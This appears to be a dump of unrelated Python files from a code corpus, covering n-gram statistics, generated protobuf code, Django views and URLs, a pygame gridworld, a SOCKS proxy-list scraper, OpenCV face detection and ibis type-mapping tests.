plt.legend(loc='best', shadow=False, scatterpoints=1)
plt.title('lda')
plt.show()
|
472 | 6d7db5b9a64ec25763f5af6ceec1a46d629d549c | import re
import ngram
import smoothedNgram
def split_into_sentences(text):
text = text.lower()
sentences = re.split(r'(?<!\w\.\w.)(?<![A-Z][a-z]\.)(?<=\.|\?)\s', text)
getSentences(sentences,text)
return sentences
def getTextWithoutSpaces(text):
withoutLineBreaks = text.replace("\n", "")
withoutSpaces = re.sub(' +', ' ', withoutLineBreaks)
return withoutSpaces
def getSentences(sentences,text):
data = re.findall(r'\b[a-zA-Z]+|[.!?]', text)
unique_words = set(data)
sentenceCounter=0
wordCounter=0
for i in sentences:
sentenceCounter += 1
i = i.lower()
words = i.split()
wordCounter += len(words)
print('Total sentence in the text : ' + str(sentenceCounter-1))
print('Total word in the text : ' + str(wordCounter))
print('Unique word number : ' + str(len(unique_words)-1))
def getText():
file = open("hw01_FireFairies.txt")
data = file.read()
return data
def listResults():
print('')
split_into_sentences(getText())
print('')
words,listOfBigrams, unigramCounts, bigramCounts = ngram.createBigram(getTextWithoutSpaces(getText()))
listOfProbBigram, listOfBigrams, listOfProbUnigram, words = ngram.calcBigramProb(words, listOfBigrams, unigramCounts, bigramCounts)
words, flipped = ngram.maxUnigram(listOfProbBigram, listOfBigrams, listOfProbUnigram, words)
ngram.findLeastValues(words, flipped)
if __name__ == '__main__':
listResults()
|
473 | 654586443e96f84aae70b3ce3263b0458a27334b | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/googleads_v1/proto/services/user_interest_service.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.ads.google_ads.v1.proto.resources import user_interest_pb2 as google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_user__interest__pb2
from google.api import annotations_pb2 as google_dot_api_dot_annotations__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='google/ads/googleads_v1/proto/services/user_interest_service.proto',
package='google.ads.googleads.v1.services',
syntax='proto3',
serialized_options=_b('\n$com.google.ads.googleads.v1.servicesB\030UserInterestServiceProtoP\001ZHgoogle.golang.org/genproto/googleapis/ads/googleads/v1/services;services\242\002\003GAA\252\002 Google.Ads.GoogleAds.V1.Services\312\002 Google\\Ads\\GoogleAds\\V1\\Services\352\002$Google::Ads::GoogleAds::V1::Services'),
serialized_pb=_b('\nBgoogle/ads/googleads_v1/proto/services/user_interest_service.proto\x12 google.ads.googleads.v1.services\x1a;google/ads/googleads_v1/proto/resources/user_interest.proto\x1a\x1cgoogle/api/annotations.proto\"/\n\x16GetUserInterestRequest\x12\x15\n\rresource_name\x18\x01 \x01(\t2\xcd\x01\n\x13UserInterestService\x12\xb5\x01\n\x0fGetUserInterest\x12\x38.google.ads.googleads.v1.services.GetUserInterestRequest\x1a/.google.ads.googleads.v1.resources.UserInterest\"7\x82\xd3\xe4\x93\x02\x31\x12//v1/{resource_name=customers/*/userInterests/*}B\xff\x01\n$com.google.ads.googleads.v1.servicesB\x18UserInterestServiceProtoP\x01ZHgoogle.golang.org/genproto/googleapis/ads/googleads/v1/services;services\xa2\x02\x03GAA\xaa\x02 Google.Ads.GoogleAds.V1.Services\xca\x02 Google\\Ads\\GoogleAds\\V1\\Services\xea\x02$Google::Ads::GoogleAds::V1::Servicesb\x06proto3')
,
dependencies=[google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_user__interest__pb2.DESCRIPTOR,google_dot_api_dot_annotations__pb2.DESCRIPTOR,])
_GETUSERINTERESTREQUEST = _descriptor.Descriptor(
name='GetUserInterestRequest',
full_name='google.ads.googleads.v1.services.GetUserInterestRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='resource_name', full_name='google.ads.googleads.v1.services.GetUserInterestRequest.resource_name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=195,
serialized_end=242,
)
DESCRIPTOR.message_types_by_name['GetUserInterestRequest'] = _GETUSERINTERESTREQUEST
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
GetUserInterestRequest = _reflection.GeneratedProtocolMessageType('GetUserInterestRequest', (_message.Message,), dict(
DESCRIPTOR = _GETUSERINTERESTREQUEST,
__module__ = 'google.ads.googleads_v1.proto.services.user_interest_service_pb2'
,
__doc__ = """Request message for
[UserInterestService.GetUserInterest][google.ads.googleads.v1.services.UserInterestService.GetUserInterest].
Attributes:
resource_name:
Resource name of the UserInterest to fetch.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v1.services.GetUserInterestRequest)
))
_sym_db.RegisterMessage(GetUserInterestRequest)
DESCRIPTOR._options = None
_USERINTERESTSERVICE = _descriptor.ServiceDescriptor(
name='UserInterestService',
full_name='google.ads.googleads.v1.services.UserInterestService',
file=DESCRIPTOR,
index=0,
serialized_options=None,
serialized_start=245,
serialized_end=450,
methods=[
_descriptor.MethodDescriptor(
name='GetUserInterest',
full_name='google.ads.googleads.v1.services.UserInterestService.GetUserInterest',
index=0,
containing_service=None,
input_type=_GETUSERINTERESTREQUEST,
output_type=google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_user__interest__pb2._USERINTEREST,
serialized_options=_b('\202\323\344\223\0021\022//v1/{resource_name=customers/*/userInterests/*}'),
),
])
_sym_db.RegisterServiceDescriptor(_USERINTERESTSERVICE)
DESCRIPTOR.services_by_name['UserInterestService'] = _USERINTERESTSERVICE
# @@protoc_insertion_point(module_scope)
|
474 | 7bd2a29bff1e435cf813dd54109d7f4e17612425 | #from tinyTensor.Node import Node
import tinyTensor
import plotly.plotly as py
from graphviz import render
#from tinyTensor.Operation import Operation
def init():
global _default_graph
_default_graph = None
def postOrder(node):
nodes_postorder = []
def recurse(node):
if isinstance(node, tinyTensor.Node.Node):
for input_node in node.inputNodes:
recurse(input_node)
nodes_postorder.append(node)
recurse(node)
return nodes_postorder
class Graph():
def __init__(self):
self.nodes = []
self.placeholderNames = []
def appendNode(self,node):
if(node.name in self.placeholderNames and node.isPlaceholder):
raise Exception("Placeholder name \"{}\" is already in use in current graph".format(node.name))
elif(node.isPlaceholder):
self.placeholderNames.append(node.name)
self.nodes.append(node)
def set_default(self):
init()
global _default_graph
_default_graph = self
def visualize_nodes(self, node):
# generating the .gv file
gv_file = "graph \"\" \n{\n"
global nodeCounter
nodeCounter = 0
def recurse(nodes,gv_file,parent_node_str = None):
global nodeCounter
nodes_list = []
if(isinstance(nodes,list)):
nodes_list.extend(nodes)
else:
nodes_list.append(nodes)
for node in nodes_list:
# node should add itself to the list
current_node_str = "n" + str(nodeCounter)
nodeCounter += 1
''' operation might contain non-node constants, hence need to make sure that they are converted to node'''
if(type(node) in (int,float)):
node = tinyTensor.Node.Node.variable(node) # creating a variable node
'''creating the node labels'''
if(isinstance(node,tinyTensor.Operation.Operation)):
gv_file += current_node_str + " [label=\"{} ({})\"] ;\n".format(node.operator,node.value)
elif(node.isPlaceholder):
gv_file += current_node_str + " [label=\"{}({})\"] ;\n".format(node.name,node.value)
else:
gv_file += current_node_str + " [label=\"{}({})\"] ;\n".format(node.name,node.value)
# now creating connection line to parent(s) TODO: make it possible to have many parents, (nodes should have output nodes list)
if(parent_node_str != None):
gv_file += parent_node_str + " -- " + current_node_str + "; \n"
# applying the same to the children of this node
if(len(node.inputNodes) > 0):
gv_file = recurse(node.inputNodes,gv_file,current_node_str)
return gv_file
gv_file = recurse(node,gv_file)
gv_file += "}\n"
with open("network.gv","w+") as file:
file.writelines(gv_file)
#render('dot','png','network.gv')
print(gv_file)
def visualize_layers(self,layer_list):
neuron_dict = {}
#generating dict of neurons
gv_file = "graph \"\" \n{\n"
#dealing with input nodes
for node in layer_list[0].inputList:
neuron_dict[node] = node.name
gv_file += neuron_dict[node] + " [label=\"{}({})\"] ;\n".format(node.name,node.value)
# creating dict for neurons
for layer in layer_list:
for neuron in layer.neuronList:
neuron_dict[neuron] = "{}".format(neuron.name)
gv_file += neuron_dict[neuron] + " [label=\"{}({})\"] ;\n".format(neuron.name,neuron.value)
# drawing links between neurons
for layer in layer_list:
for neuron in layer.neuronList:
for input_neuron in neuron.inputNeurons:
gv_file += neuron_dict[neuron] + " -- " + neuron_dict[input_neuron] + "; \n"
gv_file += "}\n"
with open("network.gv","w+") as file:
file.writelines(gv_file)
print(gv_file)
|
475 | 22da05d9bf6139a0306bfb2d1df96e9e2cf6a0c6 | # vim: tabstop=4 expandtab autoindent shiftwidth=4 fileencoding=utf-8
from django.contrib.auth.decorators import login_required
from django.contrib.auth import models as auth_models
from django.contrib.auth import forms as auth_forms
from django.contrib.auth import authenticate, login
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext_noop as _
from django.contrib import messages
from django.http import HttpResponseRedirect
from django.shortcuts import get_object_or_404, render_to_response
from django.template import RequestContext
from django_mises.blog import models as blog_models
from django_mises.users import forms as users_forms
from django_mises import email_helpers
def user_view(request, username):
"""View the user
"""
import datetime
user = get_object_or_404(auth_models.User, username=username, is_active=True)
now = datetime.datetime.now()
post_count = blog_models.Post.objects.filter(author=user, publish_at__lte=now).count()
# Needs verification?
email_verification_form = None
if request.user.id == user.id and not user.get_profile().is_verified:
data = request.POST.copy() or None
email_verification_form = users_forms.EmailVerificationForm(data=data)
if email_verification_form.is_bound:
email_verification_form.data['user'] = request.user
if email_verification_form.is_valid():
email_verification_form.save()
messages.info(request, 'Tunnuksesi on aktivoitu!')
return HttpResponseRedirect(reverse('user', args=(request.user.username,)))
# Avoid template namespace clash
context = {
'viewed_user': user,
'post_count': post_count,
'email_verification_form': email_verification_form,
}
req_ctx = RequestContext(request, context)
return render_to_response('user.html', req_ctx)
def register(request):
"""Registration view, Django offers none
"""
data = request.POST.copy() or None
user_creation_form = auth_forms.UserCreationForm(data)
if user_creation_form.is_bound:
if user_creation_form.is_valid():
user = user_creation_form.save()
user = authenticate(username=user.username, password=user_creation_form.cleaned_data['password1'])
login(request, user)
return HttpResponseRedirect(reverse('user', args=(user.username,)))
context = {
'user_creation_form': user_creation_form,
}
req_ctx = RequestContext(request, context)
return render_to_response('register.html', req_ctx)
@login_required
def get_verification_code(request):
"""Maybe ajaxify this in the future
"""
if request.user.get_profile().is_verified:
messages.info(request, 'Olet jo vahvistanut osoitteesi')
else:
verification_code = request.user.get_profile().gen_verification_code()
extractx = {
'code': verification_code,
}
subject = _('Verification code')
email_helpers.send_user_email(request.user, subject, 'send_verification_code.txt', extractx)
messages.info(request, 'Vahvistuskoodi on lรคhetetty sรคhkรถpostiisi')
return HttpResponseRedirect(reverse('user', args=(request.user.username,)))
# EOF
|
476 | 40158bbfd9c95a8344f34431d0b0e98c4a1bf6ed | '''
Code for mmDGM
Author: Chongxuan Li (chongxuanli1991@gmail.com)
Version = '1.0'
'''
import gpulearn_mm_z_x
import sys, os
import time
import color
n_hidden = (500,500)
if len(sys.argv) > 2:
n_hidden = tuple([int(x) for x in sys.argv[2:]])
nz=500
if os.environ.has_key('nz'):
nz = int(os.environ['nz'])
if os.environ.has_key('stepsize'):
alpha = float(os.environ['stepsize'])
else:
alpha = 3e-4
if os.environ.has_key('decay1'):
decay1 = float(os.environ['decay1'])
else:
decay1 = 0.1
if os.environ.has_key('decay2'):
decay2 = float(os.environ['decay2'])
else:
decay2 = 0.001
if os.environ.has_key('random_seed'):
seed = 0
if int(os.environ['random_seed']) == 1:
seed = int(time.time())
if int(os.environ['random_seed'] > 1):
seed = int(os.environ['random_seed'])
color.printRed('random_seed ' + str(seed))
else:
seed = int(time.time())
color.printRed('random_seed ' + str(seed))
#print 'random_seed (bool) missing.'
#exit()
gpulearn_mm_z_x.main(dataset=sys.argv[1], n_z=nz, n_hidden=n_hidden, seed=seed, comment='', alpha=alpha, decay1=decay1, decay2=decay2, gfx=True)
#gpulearn_z_x.main(n_data=50000, dataset='svhn_pca', n_z=300, n_hidden=(500,500), seed=0)
|
477 | e543c7f7f1b249e53b8ebf82641ec398abf557af | button6 = Button(tk,text=" ",font=('Times 26 bold'), heigh = 4, width = 8, command=lambda:checker(button6))
button6.grid(row=2, column=2,sticky = S+N+E+W)
button7 = Button(tk,text=" ",font=('Times 26 bold'), heigh = 4, width = 8, command=lambda:checker(button7))
button7.grid(row=3, column=0,sticky = S+N+E+W)
button8 = Button(tk,text=" ",font=('Times 26 bold'), heigh = 4, width = 8, command=lambda:checker(button8))
button8.grid(row=3, column=1,sticky = S+N+E+W)
button9 = Button(tk,text=" ",font=('Times 26 bold'), heigh = 4, width = 8, command=lambda:checker(button9))
button9.grid(row=3, column=2,sticky = S+N+E+W)
tk.mainloop() |
478 | 647dde6e3288ded29336062b78baacc3a92908a7 | import re
import random
import requests
from bs4 import BeautifulSoup
import js2py
from fake_useragent import UserAgent
def _get_request_key(session):
res = session.post("https://spys.one/en/socks-proxy-list/")
soup = BeautifulSoup(res.text, 'html.parser')
return soup.find("input", {"name": "xx0"}).get("value")
def _get_proxy_list(session, xx0):
res = session.post("https://spys.one/en/socks-proxy-list/",
data=f"xx0={xx0}&xpp={0}&xf1={0}&xf2={0}&xf4={0}&xf5={2}",
headers={
"Content-Type": "application/x-www-form-urlencoded",
})
soup = BeautifulSoup(res.text, 'html.parser')
js = js2py.EvalJs({"document": {"write": lambda a: a}})
js.execute(soup.select_one("body > script").string)
addrs = soup.select("tr[onmouseover] > td:first-child")
ports = [js.eval(i.find("script").string) for i in addrs]
addrs = [i.get_text() for i in addrs]
ports = [re.sub(r"<[^<]*>", "", i) for i in ports]
return list(map(''.join, zip(addrs, ports)))
class ProxyScrapper:
def __init__(self):
self._proxies = []
def refresh(self):
session = requests.Session()
session.headers["User-Agent"] = UserAgent().random
print("Rotating proxy list")
xx0 = _get_request_key(session)
print(f"Got proxy request key xx0={xx0}")
addrs = _get_proxy_list(session, xx0)
self._proxies = [f"socks5://{i}" for i in addrs]
print(f"Got {len(self._proxies)} proxies")
def random(self):
assert(len(self._proxies) > 0)
return random.choice(self._proxies)
|
479 | aebc8665a97ab0a71b1d8a920b5cbf2643254883 | from base_page import Base_Page
import locators
class Product_Object:
"Page Object for the table"
#locators
def get_all_text(self):
"Get the text within the table"
table_text = []
row_doms = self.get_elements(self.rows_xpath)
for index,row_dom in enumerate(row_doms):
row_text = []
cell_doms = self.get_elements(self.cols_relative_xpath%(index+1))
for cell_dom in cell_doms:
row_text.append(self.get_dom_text(cell_dom))
table_text.append(row_text)
return table_text
def get_num_rows(self):
"Get the total number of rows in the table"
#NOTE: We do not count the header row
row_doms = self.get_elements(self.rows_xpath)
return len(row_doms)
def get_num_cols(self):
"Return the number of columns"
#NOTE: We just count the columns in the header row
col_doms = self.get_elements(self.cols_header)
return len(col_doms)
def get_column_text(self,column_name):
"Get the text within a column"
pass
def get_column_names(self):
"Return a list with the column names"
column_names = []
col_doms = self.get_elements(self.cols_header)
for col_dom in col_doms:
column_names.append(self.get_dom_text(col_dom))
return column_names
def check_cell_text_present(self,text,column_name='all'):
"Check if the text you want is present in a cell"
result_flag = False
if column_name == 'all':
table_text = self.get_all_text()
else:
table_text = [self.get_column_text(column_name)]
for row in table_text:
for col in row:
if col == text:
result_flag = True
break
if result_flag is True:
break
return result_flag
def check_name_present(self,name):
"Check if the supplied name is present anywhere in the table"
return self.check_cell_text_present(name,column_name='name')
def print_table_text(self):
"Print out the table text neatly"
column_names = self.get_column_names()
table_text = self.get_all_text()
self.write('||'.join(column_names))
for row in table_text:
self.write('|'.join(row))
|
480 | 24290f3a6cf9a0a272186a505d31c62a6f278c86 | #! /usr/bin/env python
#printing the sum of the even Fibonacci numbers
n= int(raw_input("enter your number"))
sumeven=0
# Defining the Fibonacci function
def fib(n):
a,b = 0,1 #first numbers of the sequence
while 1:
yield a
a,b = b,a+b #generator for the next number in the sequence
a = fib(n)
for i in range(n):
b= a.next() #get the next number in the sequence
if b<=4000000: #check if value returned exceeds 4 million
if b % 2 == 0:
sumeven +=b #calculate the sum of even numbers
print "%d,%d"%(b,sumeven)
|
481 | 1fbd4e45b061b4d6cefb46e3bc612533ec94250b | __author__ = 'sudab'
""" Generate a grid world """
import os, sys, getopt, pdb, string
import random
import numpy as np
import pygame
from skimage import io
import cv2
import pygame.locals as pgl
class Gridworld():
# a gridworld with uneven terrain
def __init__(self, filename=None, initial=0, nrows=8, ncols=8, nagents=1, targets=[], obstacles=[], moveobstacles = [], regions=dict()):
# walls are the obstacles. The edges of the gridworld will be included into the walls.
# region is a string and can be one of: ['pavement','gravel', 'grass', 'sand']
if filename != None:
data = io.imread(filename)
data = cv2.resize(data, dsize=(16, 16), interpolation=cv2.INTER_AREA)
regionkeys = {'pavement', 'gravel', 'grass', 'sand', 'deterministic'}
(nrows,ncols) = data.shape
data = data.flatten()
obstacles = list(np.where(data==0)[0])
regions = dict.fromkeys(regionkeys, {-1})
regions['deterministic'] = range(nrows * ncols)
self.current = initial
self.nrows = nrows
self.ncols = ncols
self.obstacles = obstacles
self.regions = regions
self.nagents = nagents
self.nstates = nrows * ncols
self.nactions = 5
self.obstacles = obstacles
self.actlist = ['R','N', 'S', 'W', 'E']
self.targets = targets
self.left_edge = []
self.right_edge = []
self.top_edge = []
self.bottom_edge = []
self.regions = regions
self.moveobstacles = moveobstacles
self.states = range(nrows*ncols)
self.colorstates = set()
for x in range(self.nstates):
# note that edges are not disjoint, so we cannot use elif
if x % self.ncols == 0:
self.left_edge.append(x)
if 0 <= x < self.ncols:
self.top_edge.append(x)
if x % self.ncols == self.ncols - 1:
self.right_edge.append(x)
if (self.nrows - 1) * self.ncols <= x <= self.nstates:
self.bottom_edge.append(x)
self.edges = self.left_edge + self.top_edge + self.right_edge + self.bottom_edge
self.walls = self.edges + obstacles
self.prob = {a: np.zeros((self.nstates, self.nstates)) for a in self.actlist}
self.probOfSuccess = dict([])
self.getProbRegions()
for s in self.states:
for a in self.actlist:
self.getProbs(s, a)
def coords(self, s):
return (s / self.ncols, s % self.ncols) # the coordinate for state s.
def isAllowed(self, (row,col)):
if col not in range(self.ncols) or row not in range(self.nrows):
return False
return True
def isAllowedState(self,(row,col),returnState):
if self.isAllowed((row,col)):
return self.rcoords((row,col))
return returnState
def getProbRegions(self):
probOfSuccess = dict([])
for ground in self.regions.keys():
for direction in ['N', 'S', 'E', 'W']:
if ground == 'pavement':
mass = random.choice(range(90, 95))
massleft = 100 - mass
oneleft = random.choice(range(1, massleft))
twoleft = massleft - oneleft
if ground == 'gravel':
mass = random.choice(range(80, 85))
massleft = 100 - mass
oneleft = random.choice(range(1, massleft))
twoleft = massleft - oneleft
if ground == 'grass':
mass = random.choice(range(85, 90))
massleft = 100 - mass
oneleft = random.choice(range(1, massleft))
twoleft = massleft - oneleft
if ground == 'sand':
mass = random.choice(range(65, 70))
massleft = 100 - mass
oneleft = random.choice(range(1, massleft))
twoleft = massleft - oneleft
if ground == 'deterministic':
mass = 100
oneleft = 0
twoleft = 0
probOfSuccess[(ground, direction)] = [float(mass) / 100, float(oneleft) / 100, float(twoleft) / 100]
self.probOfSuccess = probOfSuccess
return
def rcoords(self, coords):
s = coords[0] * self.ncols + coords[1]
return s
def getProbs(self, state, action):
successors = []
if state in self.obstacles:
successors = [(state, 1)]
for (next_state, p) in successors:
self.prob[action][state, next_state] = p
return
row,col = self.coords(state)
northState = self.isAllowedState((row-1,col),state)
northwestState = self.isAllowedState((row-1,col-1),state)
northeastState = self.isAllowedState((row-1,col+1),state)
southState = self.isAllowedState((row+1,col),state)
southeastState = self.isAllowedState((row+1,col+1),state)
southwestState = self.isAllowedState((row+1,col-1),state)
westState = self.isAllowedState((row,col-1),state)
eastState = self.isAllowedState((row,col+1),state)
reg = self.getStateRegion(state)
if action == 'N':
[p0, p1, p2] = self.probOfSuccess[(reg, 'N')]
successors.append((northState, p0))
successors.append((northwestState, p1))
successors.append((northeastState, p2))
if action == 'S':
[p0, p1, p2] = self.probOfSuccess[(reg, 'S')]
successors.append((southState, p0))
successors.append((southwestState, p1))
successors.append((southeastState, p2))
if action == 'W':
[p0, p1, p2] = self.probOfSuccess[(reg, 'W')]
successors.append((westState, p0))
successors.append((southwestState, p1))
successors.append((northwestState, p2))
if action == 'E':
[p0, p1, p2] = self.probOfSuccess[(reg, 'W')]
successors.append((eastState, p0))
successors.append((southeastState, p1))
successors.append((northeastState, p2))
if action == 'R':
successors.append((state,1))
for (next_state, p) in successors:
self.prob[action][state, next_state] += p
def getStateRegion(self, state):
if state in self.regions['pavement']:
return 'pavement'
if state in self.regions['grass']:
return 'grass'
if state in self.regions['gravel']:
return 'gravel'
if state in self.regions['sand']:
return 'sand'
if state in self.regions['deterministic']:
return 'deterministic'
## Everything from here onwards is for creating the image
def render(self, size=10):
self.height = self.nrows * size + self.nrows + 1
self.width = self.ncols * size + self.ncols + 1
self.size = size
# # initialize pygame ( SDL extensions )
pygame.init()
pygame.display.set_mode((self.width, self.height))
pygame.display.set_caption('Gridworld')
self.screen = pygame.display.get_surface()
self.surface = pygame.Surface(self.screen.get_size())
self.bg = pygame.Surface(self.screen.get_size())
self.bg_rendered = False # optimize background render
self.background()
self.screen.blit(self.surface, (0, 0))
pygame.display.flip()
self.build_templates()
self.updategui = True # switch to stop updating gui if you want to collect a trace quickly
self.state2circle(self.current)
def getkeyinput(self):
events = pygame.event.get()
for event in events:
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_LEFT:
return 'W'
elif event.key == pygame.K_RIGHT:
return 'E'
if event.key == pygame.K_UP:
return 'N'
elif event.key == pygame.K_DOWN:
return 'S'
elif event.key == pygame.K_SPACE:
return 'Space'
def build_templates(self):
# Note: template already in "graphics" coordinates
template = np.array([(-1, 0), (0, 0), (1, 0), (0, 1), (1, 0), (0, -1)])
template = self.size / 3 * template # scale template
v = 1.0 / np.sqrt(2)
rot90 = np.array([(0, 1), (-1, 0)])
rot45 = np.array([(v, -v), (v, v)]) # neg
#
# align the template with the first action.
t0 = np.dot(template, rot90)
t0 = np.dot(t0, rot90)
t0 = np.dot(t0, rot90)
t1 = np.dot(t0, rot45)
t2 = np.dot(t1, rot45)
t3 = np.dot(t2, rot45)
t4 = np.dot(t3, rot45)
t5 = np.dot(t4, rot45)
t6 = np.dot(t5, rot45)
t7 = np.dot(t6, rot45)
self.t = [t0, t1, t2, t3, t4, t5, t6, t7]
def indx2coord(self, s, center=False):
# the +1 indexing business is to ensure that the grid cells
# have borders of width 1px
i, j = self.coords(s)
if center:
return i * (self.size + 1) + 1 + self.size / 2, \
j * (self.size + 1) + 1 + self.size / 2
else:
return i * (self.size + 1) + 1, j * (self.size + 1) + 1
def accessible_blocks(self, s):
"""
For a give state s, generate the list of walls around it.
"""
W = []
if s in self.walls:
return W
if s - self.ncols < 0 or s - self.ncols in self.walls:
pass
else:
W.append(s - self.ncols)
if s - 1 < 0 or s - 1 in self.walls:
pass
else:
W.append(s - 1)
if s + 1 in self.walls:
pass
else:
W.append(s + 1)
if s + self.ncols in self.walls:
pass
else:
W.append(s + self.ncols)
return W
def coord2indx(self, (x, y)):
return self.rcoords((x / (self.size + 1), y / (self.size + 1)))
def draw_state_labels(self):
font = pygame.font.SysFont("FreeSans", 10)
for s in range(self.nstates):
x, y = self.indx2coord(s, False)
txt = font.render("%d" % s, True, (0, 0, 0))
self.surface.blit(txt, (y, x))
self.screen.blit(self.surface, (0, 0))
pygame.display.flip()
def coord2state(self, coord):
s = self.coord2indx((coord[0], coord[1]))
return s
def state2circle(self, state, bg=True, blit=True):
if bg:
self.background()
for n in range(self.nagents):
x, y = self.indx2coord(state[n], center=True)
pygame.draw.circle(self.surface, (0+(50*n), 0+(20*n), 255.0/(n+1)), (y, x), self.size / 2)
if len(self.moveobstacles) > 0:
for s in self.moveobstacles:
x, y = self.indx2coord(s, center=True)
pygame.draw.circle(self.surface, (205, 92, 0), (y, x), self.size / 2)
if blit:
self.screen.blit(self.surface, (0, 0))
pygame.display.flip()
def draw_values(self, vals):
"""
vals: a dict with state labels as the key
"""
font = pygame.font.SysFont("FreeSans", 10)
for s in range(self.nstates):
x, y = self.indx2coord(s, False)
v = vals[s]
txt = font.render("%.1f" % v, True, (0, 0, 0))
self.surface.blit(txt, (y, x))
self.screen.blit(self.surface, (0, 0))
pygame.display.flip()
#
def save(self, filename):
pygame.image.save(self.surface, filename)
def redraw(self):
self.screen.blit(self.surface, (0, 0))
pygame.display.flip()
def move_obj(self, s, bg=True, blit=True):
"""Including A moving object into the gridworld, which moves uniformly at
random in all accessible directions (including idle), without
hitting the wall or another other statitic obstacle. Input: a
gridworld gui, the current state index for the obstacle and the
number of steps.
"""
if bg:
self.background()
x, y = self.indx2coord(s, center=True)
pygame.draw.circle(self.surface, (205, 92, 0), (y, x), self.size / 2)
if blit:
self.screen.blit(self.surface, (0, 0))
pygame.display.flip()
return
def move_deter(self, next_state):
self.current = next_state
return
def background(self):
if self.bg_rendered:
self.surface.blit(self.bg, (0, 0))
else:
self.bg.fill((84, 84, 84))
font = pygame.font.SysFont("FreeSans", 10)
for s in range(self.nstates):
x, y = self.indx2coord(s, False)
coords = pygame.Rect(y, x, self.size, self.size)
pygame.draw.rect(self.bg, ((250, 250, 250)), coords)
for n in range(self.nagents):
for t in self.targets[n]:
x, y = self.indx2coord(t, center=True)
coords = pygame.Rect(y - self.size / 2, x - self.size / 2, self.size, self.size)
pygame.draw.rect(self.bg, (0+(50*n), 204.0/(n+1), 102.0+(50*n)/(n+1)), coords)
for s in self.obstacles:
(x, y) = self.indx2coord(s)
coords = pygame.Rect(y, x, self.size, self.size)
pygame.draw.rect(self.bg, (255, 0, 0), coords) # the obstacles are in color red
color = {'sand': (223, 225, 179), 'gravel': (255, 255, 255), 'grass': (211, 255, 192),
'pavement': (192, 255, 253),'deterministic': (255,255,255)}
for s in range(self.nstates):
if s not in self.edges and not any(s in x for x in self.targets) and s not in self.obstacles and not any(s in x for x in self.colorstates):
(x, y) = self.indx2coord(s)
coords = pygame.Rect(y - self.size / 2, x - self.size / 2, self.size, self.size)
coords = pygame.Rect(y, x, self.size, self.size)
pygame.draw.rect(self.bg, color[self.getStateRegion(s)], coords) # the obstacles are in color grey
statecols = [(0,0,0),(150,150,150)]
for i in range(len(self.colorstates)):
for s in self.colorstates[i]:
if s not in self.edges and not any(s in x for x in self.targets) and s not in self.obstacles:
(x, y) = self.indx2coord(s)
coords = pygame.Rect(y, x, self.size, self.size)
pygame.draw.rect(self.bg, statecols[i], coords) # the obstacles are in color grey
self.bg_rendered = True # don't render again unless flag is set
self.surface.blit(self.bg, (0, 0)) |
482 | 759ff4cc123e85bdc8c1457bb521cd35841956cd | import numpy as np
import cv2
face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
eye_cascade = cv2.CascadeClassifier('haarcascade_eye.xml')
img = cv2.imread('modi.jpg')
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(gray, 1.3, 5)
#Write the for loop code here
cv2.imshow('img',img)
cv2.waitKey(0)
cv2.destroyAllWindows() |
483 | 1d524312cbd3b735850046131f31c03fdfa90bbc | my_dict = {'one': '1', 'two': '2'}
for key in my_dict:
print('{} - {}'.format(key, my_dict[key])) |
484 | add56d52f3c88f814a166d12c3bc5a5906268864 | from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^class/([^/]+)/?$', views.puppet_class, name='puppet-class'),
url(r'^edit-host/(?P<fqdn>[^/]+)?/?$', views.edit_host, name='edit-host'),
url(r'^add-host/(?P<fqdn>[^/]+)?/?$', views.add_host, name='add-host'),
url(r'^delete/([^/]+)/?$', views.delete_host, name='delete-host'),
url(r'^user/(?P<loginid>[^/]+)/?$', views.edit_user, name='edit-user'),
# url(r'^add-host', views.add_host, name='add-host'),
url(r'^', views.index, name='index'),
]
|
485 | 00e9872136e5753364117adbf60793e660c8bef0 | from __future__ import annotations
import pytest
from pytest import param
import ibis
import ibis.expr.datatypes as dt
from ibis.backends.base.sql.alchemy.geospatial import geospatial_supported
DB_TYPES = [
# Exact numbers
("BIGINT", dt.int64),
("BIT", dt.boolean),
("DECIMAL", dt.Decimal(precision=18, scale=0)),
("DECIMAL(5, 2)", dt.Decimal(precision=5, scale=2)),
("INT", dt.int32),
("MONEY", dt.int64),
("NUMERIC", dt.Decimal(18, 0)),
("NUMERIC(10,5)", dt.Decimal(10, 5)),
("NUMERIC(14,3)", dt.Decimal(14, 3)),
("SMALLINT", dt.int16),
("SMALLMONEY", dt.int32),
("TINYINT", dt.int8),
# Approximate numerics
("REAL", dt.float32),
("FLOAT", dt.float64),
("FLOAT(3)", dt.float32),
("FLOAT(25)", dt.float64),
# Date and time
("DATE", dt.date),
("TIME", dt.time),
("DATETIME2", dt.timestamp(scale=7)),
("DATETIMEOFFSET", dt.timestamp(scale=7, timezone="UTC")),
("SMALLDATETIME", dt.timestamp),
("DATETIME", dt.timestamp),
# Characters strings
("CHAR", dt.string),
("TEXT", dt.string),
("VARCHAR", dt.string),
# Unicode character strings
("NCHAR", dt.string),
("NTEXT", dt.string),
("NVARCHAR", dt.string),
# Binary strings
("BINARY", dt.binary),
("VARBINARY", dt.binary),
("IMAGE", dt.binary),
# Other data types
("UNIQUEIDENTIFIER", dt.uuid),
("TIMESTAMP", dt.binary(nullable=False)),
]
